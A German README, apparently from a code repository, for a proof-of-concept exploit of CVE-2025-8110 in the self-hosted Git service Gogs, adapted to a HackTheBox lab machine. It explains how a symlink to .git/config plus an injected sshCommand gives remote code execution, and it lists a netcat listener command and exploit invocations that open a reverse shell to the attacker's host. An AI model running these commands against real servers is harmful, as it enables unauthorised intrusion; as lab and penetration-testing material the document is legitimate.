
Gogs-Dienst-Exploit und Root-Benutzer erhalten
Haftungsausschluss: Dieses Tool ist ausschließlich für Bildungszwecke und autorisierte Penetrationstests gedacht. Verwenden Sie es nur gegen Systeme, für die Sie eine ausdrückliche Genehmigung zum Testen haben.
Dies ist eine modifizierte Version von zAbuQasem/gogs-CVE-2025-8110, die an die Silentium-Maschine auf HackTheBox angepasst wurde. Der ursprüngliche PoC erforderte Anpassungen, um Silentiums spezifische Gogs-Konfiguration und Authentifizierungsablauf zu bewältigen.
CVE-2025-8110 ist eine Remote-Codeausführungs-Schwachstelle in Gogs, einem selbst gehosteten Git-Dienst.
Der Datei-Update-API-Endpunkt von Gogs (PUT /api/v1/repos/.../contents/<file>) validiert nicht, ob die Zieldatei ein Symlink ist. Ein authentifizierter Angreifer kann einen Symlink in ein Repository pushen, der auf .git/config zeigt, und dann die API verwenden, um ihn mit einer bösartigen Nutzlast zu überschreiben. Die Nutzlast injiziert einen benutzerdefinierten sshCommand in die Git-Konfiguration, den Gogs serverseitig ausführt, wenn es das nächste Mal eine SSH-Operation auf diesem Repository durchführt, was zu einer Remote-Codeausführung führt.
malicious_link -> .git/config) und pusht ihn..git/config, die sshCommand = <reverse shell> enthält..git/config, was die Shell bei der nächsten SSH-Operation auslöst.Abhängigkeiten installieren:
pip install -r requirements.txt
Einen Listener starten:
nc -lvnp <PORT>
Den Exploit ausführen:
python3 CVE-2025-8110.py -u http://<TARGET_URL> -lh <YOUR_IP> -lp <PORT> -un <USERNAME> -pw <PASSWORD>
Optional — über Burp Suite leiten:
python3 CVE-2025-8110.py -u http://<TARGET_URL> -lh <YOUR_IP> -lp <PORT> -un <USERNAME> -pw <PASSWORD> -x
| Flag | Beschreibung |
|---|---|
-u | Gogs-Basis-URL |
-lh | Ihre Angreifer-IP (Reverse-Shell-Host) |
-lp | Ihr Listener-Port |
-un | Ihr registrierter Gogs-Benutzername |
-pw | Ihr Gogs-Passwort |
-x | (Optional) Verkehr über Burp auf localhost:8080 leiten |